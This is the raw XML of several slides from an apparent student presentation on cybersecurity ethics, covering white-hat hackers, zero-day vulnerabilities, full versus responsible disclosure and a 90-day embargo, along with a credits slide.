        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111128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54EF81D-72A6-4D18-AB9B-1EBF7BEBA354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A81959F-AFB0-4492-AE7D-CB83AFBEFF50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>White </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>hats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>: the good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>ones</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC024431-7909-41CD-BA60-AB36CEA270B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300329" y="1222311"/>
            <a:ext cx="9020175" cy="4815310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>kind</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of hacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>his</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> knowledge to prove </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>himself</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>trying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>penetrating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of machines </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> making </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>damage</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They are the so called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ethical hackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> who create algorithms to break existing internet networks so as to solve the loopholes in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Usually an elite hacker (a very skilled cybersecurity expert) that finds a vulnerability may decide to keep it secret or to report it. Motivations for keeping a vulnerability secret include planned criminal actions, espionage by secret services, and accessing a suspect’s device by law enforcement.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unreported vulnerability that has got no fix is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“zero-day” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“0-day” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>vulnerability.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White hat hackers can choose to report a vulnerability in two different ways:  </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Full disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Responsible disclosure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8" descr="Immagine che contiene testo, persona, uomo, interni&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67B3EB3F-909B-47AB-AED2-AE44BB675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939" y="102636"/>
            <a:ext cx="2831867" cy="2665731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2384499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728301B9-4751-45C3-847E-E726CD7D22CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Titolo 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{556473CD-921B-4952-89E3-662349478BCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>credits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD90D92F-8F48-4B49-B692-5FD5A93CB18F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701775" y="2228671"/>
            <a:ext cx="8591550" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>would</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> like to thank </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" b="1" dirty="0"/>
              <a:t>Prof. Guglielmo Tamburrini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>for giving me </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>opportunity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to talk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" u="sng" dirty="0" err="1"/>
              <a:t>cybesecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and ethics: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> makes me so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>proud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>because</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>I’ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>interested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>topic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>child</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> and to talk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>about</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in front of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>whole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>classroom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>little</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> dream coming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1570495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7910B00-24B0-43EA-BA01-B190031A30B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Full vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>responsible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto testo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A89FDF32-229A-49A1-AFCC-800DFCAC5BB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="940920"/>
            <a:ext cx="4500000" cy="527076"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Segnaposto testo 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C788C2AC-38F2-4DAF-89A3-031E6B26C9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129800" y="942713"/>
            <a:ext cx="4500000" cy="525283"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Responsible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Segnaposto testo 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D95979D5-C713-4343-840B-1C4002282CA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5129800" y="1546709"/>
            <a:ext cx="4500000" cy="4685162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mandates informing the vendor first, usually granting it a specific timeframe to release a fix before going public.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The length of this embargo is a trade-off between putting pressure on the vendor and giving the vendor the opportunity to investigate the issue thoroughly, including extensive testing of the fix. A typical value is 90 days.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vendors may ask for an extension of the embargo. However, it is at the discretion of the finder to grant it. For instance, there has been a high profile case in which security researchers working at Google have not granted Microsoft an extension (Tung 2018).</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto numero diapositiva 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798382B2-7BA9-4CA0-9F31-E1095C5A3664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:fld id="{19B51A1E-902D-48AF-9020-955120F399B6}" type="slidenum">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:pPr rtl="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CasellaDiTesto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6002F772-E4B4-448A-A98F-91B3C3E12562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4749732" y="6450708"/>
            <a:ext cx="9334500" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.researchgate.net/publication/339161649_The_Ethics_of_Cybersecurity</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CasellaDiTesto 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448B7DEF-D345-4C01-B290-CF3F558A0F1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432000" y="1512981"/>
            <a:ext cx="4500000" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>notifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vendor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>advance</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Advocates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> of full </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>argue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> users of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>regarding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>able</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>assess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> risks and take appropriate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>countermeasures</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They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> the risk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>adversaries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> use information to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>develop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> an exploit and target the users of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
